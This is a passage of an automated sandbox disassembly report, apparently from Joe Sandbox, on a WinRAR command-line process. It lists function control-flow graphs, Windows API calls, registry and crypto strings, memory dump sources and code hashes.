7ff6ee745485-7ff6ee74548c call 7ff6ee748444 1510->1517 1512->1496 1513->1507 1515 7ff6ee7453a7-7ff6ee7453d5 call 7ff6ee7445c8 call 7ff6ee77ab1c 1513->1515 1515->1510 1560 7ff6ee7453db-7ff6ee7453ea call 7ff6ee76ba9c 1515->1560 1517->1516 1518->1507 1519->1424 1536 7ff6ee74525d-7ff6ee745260 1521->1536 1537 7ff6ee74526b-7ff6ee745272 1521->1537 1526->1542 1527->1510 1536->1499 1549 7ff6ee745266 1536->1549 1537->1490 1556 7ff6ee745367 1542->1556 1545->1437 1546->1491 1549->1518 1556->1510 1560->1510
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: wcschr
                                                                                                                                                                      • String ID: .part$.rar$.rar$AFUMD$FUADPXETK$stdin
                                                                                                                                                                      • API String ID: 1497570035-1281034975
                                                                                                                                                                      • Opcode ID: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                      • Instruction ID: cc08f902b5a2a1424913726875cc7af2d4639937dafd8e8de16a6b9cb434b07a
                                                                                                                                                                      • Opcode Fuzzy Hash: 43ddd1800645f40e7e0ad877604b3aadd6ee3f0a81332a219ef4bf9da79026d2
                                                                                                                                                                      • Instruction Fuzzy Hash: 63C1A863A2C98250EF649A25C8513FC2351EF66785F464033F94DCA5DADEAEE522C30B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE777F24 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1564 7ff6ee777f24-7ff6ee777f5c 1565 7ff6ee777fd0 1564->1565 1566 7ff6ee777f5e-7ff6ee777f64 1564->1566 1568 7ff6ee777fd7-7ff6ee777fea 1565->1568 1566->1565 1567 7ff6ee777f66-7ff6ee777f7c call 7ff6ee77b3f0 1566->1567 1578 7ff6ee777fb5 1567->1578 1579 7ff6ee777f7e-7ff6ee777fb3 GetProcAddressForCaller GetProcAddress 1567->1579 1570 7ff6ee777fec-7ff6ee777fef 1568->1570 1571 7ff6ee778036-7ff6ee778039 1568->1571 1573 7ff6ee77805c-7ff6ee778065 GetCurrentProcessId 1570->1573 1575 7ff6ee777ff1-7ff6ee778000 1570->1575 1571->1573 1574 7ff6ee77803b-7ff6ee77804a 1571->1574 1576 7ff6ee778077-7ff6ee778093 1573->1576 1577 7ff6ee778067 1573->1577 1585 7ff6ee77804f-7ff6ee778051 1574->1585 1584 7ff6ee778005-7ff6ee778007 1575->1584 1580 7ff6ee778069-7ff6ee778075 1577->1580 1581 7ff6ee777fbc-7ff6ee777fce 1578->1581 1579->1581 1580->1576 1580->1580 1581->1568 1584->1576 1587 7ff6ee778009 1584->1587 1585->1576 1586 7ff6ee778053-7ff6ee77805a 1585->1586 1588 7ff6ee778010-7ff6ee778034 call 7ff6ee74ca6c call 7ff6ee74cda4 call 7ff6ee74ca40 1586->1588 1587->1588 1588->1576
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                                                                                                                                      • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                                                                                      • API String ID: 1389829785-2207617598
                                                                                                                                                                      • Opcode ID: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                      • Instruction ID: 4ca7e10cec0be59e407fb0aae14e4bd9b49d1ec7373710b096162b9562016ca5
                                                                                                                                                                      • Opcode Fuzzy Hash: 55f9cc654a4765269b34be058e69e02607cbee85ebbaa2d255acd8e9286e0d92
                                                                                                                                                                      • Instruction Fuzzy Hash: 15416B27B4865380FF009B52E90063567A1AF65BD5F4A0135EC6D87794DEBEE062C70A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE78B0FC Relevance: 13.6, APIs: 9, Instructions: 92COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterPresentUnhandled__scrt_fastfail__scrt_is_nonwritable_in_current_image$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual__isa_available_init__scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock__scrt_uninitialize_crt__vcrt_initialize
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 552178382-0
                                                                                                                                                                      • Opcode ID: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                      • Instruction ID: 984a81de35c43f9a73fbd63f00b2957759b9056708657a8d58623a7a212ca7d6
                                                                                                                                                                      • Opcode Fuzzy Hash: 9c665b31eb0b804363cbc587f94f2e5aa54598bfa8fc207139a92aecf1914098
                                                                                                                                                                      • Instruction Fuzzy Hash: E7315B27E081A381EF14AB25E4513B92791AF75784F460434FA4DCB697EEAFA424C24E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE774774 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83registryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,?,?,?,00007FF6EE77495D,?,?,?,00007FF6EE767E7D), ref: 00007FF6EE7747DB
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,?,?,?,00007FF6EE77495D,?,?,?,00007FF6EE767E7D), ref: 00007FF6EE774831
                                                                                                                                                                      • ExpandEnvironmentStringsW.KERNEL32(?,?,?,?,?,00007FF6EE77495D,?,?,?,00007FF6EE767E7D), ref: 00007FF6EE774853
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00007FF6EE77495D,?,?,?,00007FF6EE767E7D), ref: 00007FF6EE7748A6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseEnvironmentExpandOpenQueryStringsValue
                                                                                                                                                                      • String ID: LanguageFolder$Software\WinRAR\General
                                                                                                                                                                      • API String ID: 1800380464-3408810217
                                                                                                                                                                      • Opcode ID: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                      • Instruction ID: ea9d8f2a3e07bd5d6a6861ee285eb9a98de5e145f3d1c11656418119e6c752d4
                                                                                                                                                                      • Opcode Fuzzy Hash: df8e8945b6f074808e1d136ded68da0d597e77b5ffd7a0622e633ce0ea7293c4
                                                                                                                                                                      • Instruction Fuzzy Hash: A831B223B18A8241EF609B61E8003BA6351FFA4794F414131FE4D87BD9EFADD164CB05
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE764398 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54registryCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,?,?,00000800,00000000,00000000,00007FF6EE7638CB,?,?,?,00007FF6EE7641EC), ref: 00007FF6EE7643D1
                                                                                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6EE7638CB,?,?,?,00007FF6EE7641EC), ref: 00007FF6EE764402
                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,00000800,00000000,00000000,00007FF6EE7638CB,?,?,?,00007FF6EE7641EC), ref: 00007FF6EE76440D
                                                                                                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,00000800,00000000,00000000,00007FF6EE7638CB,?,?,?,00007FF6EE7641EC), ref: 00007FF6EE76443E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseFileModuleNameOpenQueryValue
                                                                                                                                                                      • String ID: AppData$Software\WinRAR\Paths
                                                                                                                                                                      • API String ID: 3617018055-3415417297
                                                                                                                                                                      • Opcode ID: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                      • Instruction ID: 278287ca41216382a6f81c7c12397304d46ccb6544a092ca0734d3944b13f95f
                                                                                                                                                                      • Opcode Fuzzy Hash: 070cc4d0cc6b07d111a1af4e028d2b6750b797b38322b9f578af6c992b8e5665
                                                                                                                                                                      • Instruction Fuzzy Hash: F7119023A28B4281EF109F21F4006AA7761FF98BC8F451131FA4E43A59EFBED455CB09
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE737A5B Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 309COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1715 7ff6ee737a5b-7ff6ee737a5e 1716 7ff6ee737a68 1715->1716 1717 7ff6ee737a60-7ff6ee737a66 1715->1717 1718 7ff6ee737a6b-7ff6ee737a7c 1716->1718 1717->1716 1717->1718 1719 7ff6ee737aa8 1718->1719 1720 7ff6ee737a7e-7ff6ee737a81 1718->1720 1723 7ff6ee737aab-7ff6ee737ab8 1719->1723 1721 7ff6ee737a88-7ff6ee737a8b 1720->1721 1722 7ff6ee737a83-7ff6ee737a86 1720->1722 1724 7ff6ee737a8d-7ff6ee737a90 1721->1724 1725 7ff6ee737aa4-7ff6ee737aa6 1721->1725 1722->1719 1722->1721 1726 7ff6ee737ac8-7ff6ee737acb 1723->1726 1727 7ff6ee737aba-7ff6ee737abd 1723->1727 1724->1719 1728 7ff6ee737a92-7ff6ee737a99 1724->1728 1725->1723 1730 7ff6ee737acf-7ff6ee737ad1 1726->1730 1727->1726 1729 7ff6ee737abf-7ff6ee737ac6 1727->1729 1728->1725 1731 7ff6ee737a9b-7ff6ee737aa2 1728->1731 1729->1730 1732 7ff6ee737b2a-7ff6ee737bb0 call 7ff6ee751d34 call 7ff6ee733f04 1730->1732 1733 7ff6ee737ad3-7ff6ee737ae6 1730->1733 1731->1719 1731->1725 1744 7ff6ee737bbc 1732->1744 1745 7ff6ee737bb2-7ff6ee737bba 1732->1745 1735 7ff6ee737ae8-7ff6ee737af2 call 7ff6ee749be0 1733->1735 1736 7ff6ee737b0a-7ff6ee737b27 1733->1736 1739 7ff6ee737af7-7ff6ee737b02 1735->1739 1736->1732 1739->1736 1746 7ff6ee737bbf-7ff6ee737bc9 1744->1746 1745->1744 1745->1746 1747 7ff6ee737bda-7ff6ee737c06 call 7ff6ee73b540 1746->1747 1748 7ff6ee737bcb-7ff6ee737bd5 call 7ff6ee751e1c 1746->1748 1752 7ff6ee737c08-7ff6ee737c0f 1747->1752 1753 7ff6ee737c40 1747->1753 1748->1747 1752->1753 1754 7ff6ee737c11-7ff6ee737c14 1752->1754 1755 7ff6ee737c44-7ff6ee737c5a call 7ff6ee73aa68 1753->1755 1754->1753 1756 7ff6ee737c16-7ff6ee737c2b 1754->1756 1761 7ff6ee737c5c-7ff6ee737c6a 1755->1761 1762 7ff6ee737c85-7ff6ee737c97 call 7ff6ee73b540 1755->1762 1756->1755 1758 7ff6ee737c2d-7ff6ee737c3e call 7ff6ee789b98 1756->1758 1758->1755 1761->1762 1765 7ff6ee737c6c-7ff6ee737c7e call 7ff6ee738d98 1761->1765 1766 7ff6ee737c9c-7ff6ee737c9f 1762->1766 1765->1762 1768 7ff6ee737fa4-7ff6ee737fbe 1766->1768 1769 7ff6ee737ca5-7ff6ee737cfb call 7ff6ee769354 call 7ff6ee756378 * 2 1766->1769 1777 7ff6ee737d17-7ff6ee737d1f 1769->1777 1778 7ff6ee737cfd-7ff6ee737d10 call 7ff6ee735414 1769->1778 1780 7ff6ee737d25-7ff6ee737d28 1777->1780 1781 7ff6ee737de2-7ff6ee737de6 1777->1781 1778->1777 1780->1781 1785 7ff6ee737d2e-7ff6ee737d36 1780->1785 1783 7ff6ee737de8-7ff6ee737e49 call 7ff6ee7698dc 1781->1783 1784 7ff6ee737e4e-7ff6ee737e68 call 7ff6ee769958 1781->1784 1783->1784 1793 7ff6ee737e6a-7ff6ee737e84 1784->1793 1794 7ff6ee737e8b-7ff6ee737e8e 1784->1794 1786 7ff6ee737d38-7ff6ee737d49 call 7ff6ee78a444 1785->1786 1787 7ff6ee737d59-7ff6ee737d6a call 7ff6ee78a444 1785->1787 1799 7ff6ee737d57 1786->1799 1800 7ff6ee737d4b-7ff6ee737d56 call 7ff6ee758ae8 1786->1800 1801 7ff6ee737d78-7ff6ee737dc6 1787->1801 1802 7ff6ee737d6c-7ff6ee737d77 call 7ff6ee75cf8c 1787->1802 1793->1794 1797 7ff6ee737e90-7ff6ee737e9a call 7ff6ee769990 1794->1797 1798 7ff6ee737e9f-7ff6ee737eb8 call 7ff6ee731204 1794->1798 1797->1798 1813 7ff6ee737ec8-7ff6ee737ed9 call 7ff6ee76941c 1798->1813 1799->1801 1800->1799 1801->1781 1823 7ff6ee737dc8-7ff6ee737de1 call 7ff6ee731314 call 7ff6ee78ba34 1801->1823 1802->1801 1817 7ff6ee737eba-7ff6ee737ec3 call 7ff6ee769680 1813->1817 1818 7ff6ee737edb-7ff6ee737f9f call 7ff6ee731400 call 7ff6ee756424 call 7ff6ee73b540 1813->1818 1817->1813 1818->1768 1823->1781
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: H9
                                                                                                                                                                      • API String ID: 0-2207570329
                                                                                                                                                                      • Opcode ID: dc8ac98f76198ceb84fbff606d01c81e4b442a240a692ad2837d24375af1e692
                                                                                                                                                                      • Instruction ID: 5b76a29bb9a429fbf95436c76ca86b59604af01d988dbf8752473e8a34968632
                                                                                                                                                                      • Opcode Fuzzy Hash: dc8ac98f76198ceb84fbff606d01c81e4b442a240a692ad2837d24375af1e692
                                                                                                                                                                      • Instruction Fuzzy Hash: 27E1F363A08A9285EF50DB24E048BFE27E5EB6574CF464431EE4D83385DF7AD564C30A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE752574 Relevance: 7.6, APIs: 5, Instructions: 133fileCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1858 7ff6ee752574-7ff6ee75259c 1859 7ff6ee7525a5-7ff6ee7525a9 1858->1859 1860 7ff6ee75259e-7ff6ee7525a0 1858->1860 1862 7ff6ee7525ba-7ff6ee7525c6 1859->1862 1863 7ff6ee7525ab-7ff6ee7525b6 GetStdHandle 1859->1863 1861 7ff6ee75273a-7ff6ee752756 1860->1861 1864 7ff6ee7525c8-7ff6ee7525cd 1862->1864 1865 7ff6ee752619-7ff6ee752637 WriteFile 1862->1865 1863->1862 1866 7ff6ee752644-7ff6ee752648 1864->1866 1867 7ff6ee7525cf-7ff6ee752609 WriteFile 1864->1867 1868 7ff6ee75263b-7ff6ee75263e 1865->1868 1870 7ff6ee752733-7ff6ee752737 1866->1870 1871 7ff6ee75264e-7ff6ee752652 1866->1871 1867->1866 1869 7ff6ee75260b-7ff6ee752615 1867->1869 1868->1866 1868->1870 1869->1867 1872 7ff6ee752617 1869->1872 1870->1861 1871->1870 1873 7ff6ee752658-7ff6ee752692 GetLastError call 7ff6ee753144 SetLastError 1871->1873 1872->1868 1878 7ff6ee7526bc-7ff6ee7526d0 call 7ff6ee74c95c 1873->1878 1879 7ff6ee752694-7ff6ee7526a2 1873->1879 1885 7ff6ee7526d2-7ff6ee7526db 1878->1885 1886 7ff6ee752721-7ff6ee75272e call 7ff6ee74cf14 1878->1886 1879->1878 1880 7ff6ee7526a4-7ff6ee7526ab 1879->1880 1880->1878 1882 7ff6ee7526ad-7ff6ee7526b7 call 7ff6ee74cf34 1880->1882 1882->1878 1885->1862 1888 7ff6ee7526e1-7ff6ee7526e3 1885->1888 1886->1870 1888->1862 1889 7ff6ee7526e9-7ff6ee75271c 1888->1889 1889->1862
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000003B.00000002.228322207.00007FF6EE731000.00000020.00000001.01000000.00000018.sdmp, Offset: 00007FF6EE730000, based on PE: true
                                                                                                                                                                      • Associated: 0000003B.00000002.228314262.00007FF6EE730000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228334346.00007FF6EE7A0000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228341437.00007FF6EE7B8000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228348804.00007FF6EE7B9000.00000008.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7BA000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7C4000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7CE000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228355631.00007FF6EE7D6000.00000004.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228381241.00007FF6EE7D8000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      • Associated: 0000003B.00000002.228391215.00007FF6EE7DE000.00000002.00000001.01000000.00000018.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_59_2_7ff6ee730000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorFileLastWrite$Handle
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3350704910-0
                                                                                                                                                                      • Opcode ID: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                      • Instruction ID: 1a924b5a7fdac0216dc589ee0988674edececba282bef150a24f0347f0430a89
                                                                                                                                                                      • Opcode Fuzzy Hash: ccd0c3e83433efd0ca407849e79df603d5f0c90f747e6cdc6739dd31fcb0c28b
                                                                                                                                                                      • Instruction Fuzzy Hash: AD51C323A0868183EF24DF65E41437A63A0FB64B40F450135EB4E87BA4DFBEE455C60A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF6EE751E80 Relevance: 7.6, APIs: 5, Instructions: 127filetimeCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
